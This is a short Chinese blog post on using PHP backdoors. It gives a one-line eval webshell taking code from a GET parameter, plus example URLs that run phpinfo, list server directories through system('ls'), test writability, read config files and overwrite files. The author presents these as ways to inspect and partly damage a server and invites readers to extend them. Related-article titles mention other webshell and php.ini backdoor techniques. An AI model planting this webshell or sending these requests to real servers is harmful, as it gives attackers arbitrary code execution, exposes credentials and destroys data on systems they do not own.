美文网首页
PHP后门的一些用法

PHP后门的一些用法

作者: shadowalkerwei | 来源:发表于2018-09-04 16:22 被阅读0次

今天我们说一些最常见的PHP留后门的一些用法
首先,写一个最简单的后门,也可以叫做木马。

<?php eval($_GET['evl']);

就酱,你已经获得了这台服务器上的很多执行权限。那场景的用法有哪些呢?

打印服务器phpinfo

http://www.test.com/a.php?evl=phpinfo()

查看某个目录下有什么文件

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

获取某个文件的内容,一般用来读取配置

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

对某个可写目录进行写文件

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

好了,以上基本已经可以完成对一个服务器的查看的部分破坏了,其他的功能就试着举一反三吧。

相关文章

  • PHP后门的一些用法

    今天我们说一些最常见的PHP留后门的一些用法首先,写一个最简单的后门,也可以叫做木马。 就酱,你已经获得了这台服务...

  • 4.1 PHP

    4.1.1. 后门 4.1.1.1. php.ini构成的后门   利用 auto_prepend_file 和 ...

  • 利用web后门取得meterpreter的两种方式

    web后门是大家常用的后门之一,现介绍两种web后门,方便各位用来获得meterpreter,一种是php反弹sh...

  • PHP和MySQL

    1. PHP和面向对象 1.1 初识PHP 基本用法 PHP 中的每个代码行都必...

  • PHP的学习

    PHP运行领域 。 PHP运行环境 PHP网页运行原理 安装apache 配置apache以运行PHP程序 用法1...

  • PHP中的static关键字

    PHP和Java中都会有static这个关键字,用法也类似,当问及PHP中的static用法是,很容易想出stat...

  • 后门分析/后台拿shell

    一.本文介绍 1、本文演示asp大马、菜刀马、php马后门分析。 二.学习步骤 1、后门分析: asp马:一般只有...

  • PHP中substr() mb_substr() mb_stru

    PHP中substr() mb_substr() mb_struct()的区别和用法 PHP substr() 函...

  • preg_replace_callback

    具体用法参考php手册 示例一

  • php.ini构成的后门

    From:http://www.cnblogs.com/iamstudy/articles/php_ini_bac...

网友评论

      本文标题:PHP后门的一些用法

      本文链接:https://www.haomeiwen.com/subject/tcxnwftx.html